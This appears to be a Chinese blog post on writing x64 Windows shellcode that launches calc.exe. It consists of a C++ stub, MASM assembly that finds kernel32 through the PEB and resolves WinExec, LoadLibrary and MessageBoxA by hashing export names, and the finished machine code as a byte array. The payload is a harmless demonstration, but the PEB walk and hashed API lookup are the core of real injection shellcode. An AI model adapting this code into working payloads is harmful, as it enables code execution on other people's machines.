x64 ShellCode 弹出计算器
Main.cpp
extern "C" void PopCalculator(); extern "C" void _INT3(); int main() { _INT3(); PopCalculator(); return 0; }
Code.asm
PopCalculator proto _INT3 proto ; Hash: ; ; WinExec : 0x1A22F51 ; LoadLibrary : 0x0C917432 ; MessageBoxA : 0x1E380A6A ; GetProcAddress : 0xBBAFDF85 .code _INT3 proc int 3 ret _INT3 endp PopCalculator proc sub rsp, 100h ; ; 获取Kernel32基址 ; mov rax, gs:[60h] ; PEB mov rax, [rax+18h] ; Ldr mov rax, [rax+30h] ; InInitializationOrderModuleList _kernel32: mov rsi, [rax+10h] ; DllBase mov rbx, [rax+40h] ; BaseDllName mov rax, [rax] cmp dword ptr [rbx+0Ch], 00320033h jnz _kernel32 ; ; Call LoadLibrary ; mov rcx, rsi mov rdx, 0C917432h call FindApi mov r14, rax mov rbx, 6C6Ch push rbx mov rbx, 642E323372657375h push rbx mov rcx, rsp sub rsp, 18h ; 预留函数参数空间 call r14 mov rbx, rax ; ; Call MessageBoxA ; mov rcx, rbx mov rdx, 1E380A6Ah call FindApi mov r14, rax xor r9, r9 xor r8, r8 xor rdx, rdx xor rcx, rcx call r14 ; ; Call WinExec ; mov rcx, rsi mov rdx, 1A22F51h call FindApi mov r14, rax xor rax, rax push rax mov rax, 6578652e636c6163h push rax mov rcx, rsp sub rsp, 20h ; 预留函数参数空间 mov rdx, 1 call r14 ; ; Call ExitThread ; mov rcx, rsi mov rdx, 3148865413 call FindApi mov r14, rax mov rax, 006461h push rax mov rax, 6572685474697845h push rax mov rcx, rsi mov rdx, rsp sub rsp, 20h ; 预留函数参数空间 call r14 ; GetProcAddress mov r14, rax add rsp, 188h sub rsp, 18h ; 预留函数参数空间 xor rcx, rcx call r14 ; ExitThread ret FindApi: ; ; rcx - DLL 基址 ; rdx - 函数 Hash 值 ; sub rsp, 40h push rsi mov rdi, rdx mov rbx, rcx mov rsi, [rbx+3Ch] mov rax, rsi shl rax, 54 shr rax, 54 mov rsi, [rbx+rax+88h] ; rsi = Export Table RVA shl rsi, 32 shr rsi, 32 add rsi, rbx ; rsi = the base of Export Table push rsi mov esi, [rsi+20h] ; esi = RVA of AddressOfNames add rsi, rbx ; rsi = VA of AddressOfNames xor rcx, rcx dec ecx find_loop: inc ecx ; ecx = index of array lods dword ptr [rsi] add rax, rbx ; rax = the base of a function string xor edx, edx hash_loop: cmp byte ptr [rax], 0 je isEqual ror edx, 7 push rcx movsx ecx, byte ptr [rax] add edx, ecx ; edx = one of function's hashes pop rcx inc rax jmp hash_loop isEqual: cmp edx, edi jnz find_loop pop rsi ; rsi = the base of Export Table mov edx, [rsi+24h] ; edx = RVA of AddressOfNameOrdinals add rdx, rbx ; rdx = VA of AddressOfNameOrdinals movsx ecx, word ptr [rdx+rcx*2] ; ecx = the index of AddressOfFunctions mov edx, [rsi+1Ch] ; edx = RVA of AddressOfFunctions add rdx, rbx ; rdx = VA of AddressOfFunctions mov eax, [rdx+rcx*4] ; eax = the RVA of base of function add rax, rbx ; rax = the VA of base of function pop rsi add rsp, 40h ret PopCalculator endp end
机器码
"\x48\x81\xEC\x00\x01\x00\x00\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x48\x8B\x40\x18\x48\x8B\x40\x30\x48\x8B\x70\x10\x48\x8B\x58\x40\x48\x8B\x00\x81\x7B\x0C\x33\x00\x32\x00\x75\xEC\x48\x8B\xCE\x48\xC7\xC2\x32\x74\x91\x0C\xE8\xC0\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC3\x6C\x6C\x00\x00\x53\x48\xBB\x75\x73\x65\x72\x33\x32\x2E\x64\x53\x48\x8B\xCC\x48\x83\xEC\x18\x41\xFF\xD6\x48\x8B\xD8\x48\x8B\xCB\x48\xC7\xC2\x6A\x0A\x38\x1E\xE8\x8E\x00\x00\x00\x4C\x8B\xF0\x4D\x33\xC9\x4D\x33\xC0\x48\x33\xD2\x48\x33\xC9\x41\xFF\xD6\x48\x8B\xCE\x48\xC7\xC2\x51\x2F\xA2\x01\xE8\x6D\x00\x00\x00\x4C\x8B\xF0\x48\x33\xC0\x50\x48\xB8\x63\x61\x6C\x63\x2E\x65\x78\x65\x50\x48\x8B\xCC\x48\x83\xEC\x20\x48\xC7\xC2\x01\x00\x00\x00\x41\xFF\xD6\x48\x8B\xCE\x48\xBA\x85\xDF\xAF\xBB\x00\x00\x00\x00\xE8\x38\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC0\x61\x64\x00\x00\x50\x48\xB8\x45\x78\x69\x74\x54\x68\x72\x65\x50\x48\x8B\xCE\x48\x8B\xD4\x48\x83\xEC\x20\x41\xFF\xD6\x4C\x8B\xF0\x48\x81\xC4\x88\x01\x00\x00\x48\x83\xEC\x18\x48\x33\xC9\x41\xFF\xD6\xC3\x48\x83\xEC\x40\x56\x48\x8B\xFA\x48\x8B\xD9\x48\x8B\x73\x3C\x48\x8B\xC6\x48\xC1\xE0\x36\x48\xC1\xE8\x36\x48\x8B\xB4\x03\x88\x00\x00\x00\x48\xC1\xE6\x20\x48\xC1\xEE\x20\x48\x03\xF3\x56\x8B\x76\x20\x48\x03\xF3\x48\x33\xC9\xFF\xC9\xFF\xC1\xAD\x48\x03\xC3\x33\xD2\x80\x38\x00\x74\x0F\xC1\xCA\x07\x51\x0F\xBE\x08\x03\xD1\x59\x48\xFF\xC0\xEB\xEC\x3B\xD7\x75\xE0\x5E\x8B\x56\x24\x48\x03\xD3\x0F\xBF\x0C\x4A\x8B\x56\x1C\x48\x03\xD3\x8B\x04\x8A\x48\x03\xC3\x5E\x48\x83\xC4\x40\xC3" { 0x48, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x8B, 0x70, 0x10, 0x48, 0x8B, 0x58, 0x40, 0x48, 0x8B, 0x00, 0x81, 0x7B, 0x0C, 0x33, 0x00, 0x32, 0x00, 0x75, 0xEC, 0x48, 0x8B, 0xCE, 0x48, 0xC7, 0xC2, 0x32, 0x74, 0x91, 0x0C, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0xC7, 0xC3, 0x6C, 0x6C, 0x00, 0x00, 0x53, 0x48, 0xBB, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2E, 0x64, 0x53, 0x48, 0x8B, 0xCC, 0x48, 0x83, 0xEC, 0x18, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xD8, 0x48, 0x8B, 0xCB, 0x48, 0xC7, 0xC2, 0x6A, 0x0A, 0x38, 0x1E, 0xE8, 0x8E, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x4D, 0x33, 0xC9, 0x4D, 0x33, 0xC0, 0x48, 0x33, 0xD2, 0x48, 0x33, 0xC9, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xCE, 0x48, 0xC7, 0xC2, 0x51, 0x2F, 0xA2, 0x01, 0xE8, 0x6D, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0x33, 0xC0, 0x50, 0x48, 0xB8, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x50, 0x48, 0x8B, 0xCC, 0x48, 0x83, 0xEC, 0x20, 0x48, 0xC7, 0xC2, 0x01, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xD6, 0x48, 0x8B, 0xCE, 0x48, 0xBA, 0x85, 0xDF, 0xAF, 0xBB, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xF0, 0x48, 0xC7, 0xC0, 0x61, 0x64, 0x00, 0x00, 0x50, 0x48, 0xB8, 0x45, 0x78, 0x69, 0x74, 0x54, 0x68, 0x72, 0x65, 0x50, 0x48, 0x8B, 0xCE, 0x48, 0x8B, 0xD4, 0x48, 0x83, 0xEC, 0x20, 0x41, 0xFF, 0xD6, 0x4C, 0x8B, 0xF0, 0x48, 0x81, 0xC4, 0x88, 0x01, 0x00, 0x00, 0x48, 0x83, 0xEC, 0x18, 0x48, 0x33, 0xC9, 0x41, 0xFF, 0xD6, 0xC3, 0x48, 0x83, 0xEC, 0x40, 0x56, 0x48, 0x8B, 0xFA, 0x48, 0x8B, 0xD9, 0x48, 0x8B, 0x73, 0x3C, 0x48, 0x8B, 0xC6, 0x48, 0xC1, 0xE0, 0x36, 0x48, 0xC1, 0xE8, 0x36, 0x48, 0x8B, 0xB4, 0x03, 0x88, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xE6, 0x20, 0x48, 0xC1, 0xEE, 0x20, 0x48, 0x03, 0xF3, 0x56, 0x8B, 0x76, 0x20, 0x48, 0x03, 0xF3, 0x48, 0x33, 0xC9, 0xFF, 0xC9, 0xFF, 0xC1, 0xAD, 0x48, 0x03, 0xC3, 0x33, 0xD2, 0x80, 0x38, 0x00, 0x74, 0x0F, 0xC1, 0xCA, 0x07, 0x51, 0x0F, 0xBE, 0x08, 0x03, 0xD1, 0x59, 0x48, 0xFF, 0xC0, 0xEB, 0xEC, 0x3B, 0xD7, 0x75, 0xE0, 0x5E, 0x8B, 0x56, 0x24, 0x48, 0x03, 0xD3, 0x0F, 0xBF, 0x0C, 0x4A, 0x8B, 0x56, 0x1C, 0x48, 0x03, 0xD3, 0x8B, 0x04, 0x8A, 0x48, 0x03, 0xC3, 0x5E, 0x48, 0x83, 0xC4, 0x40, 0xC3 };
浙公网安备 33010602011771号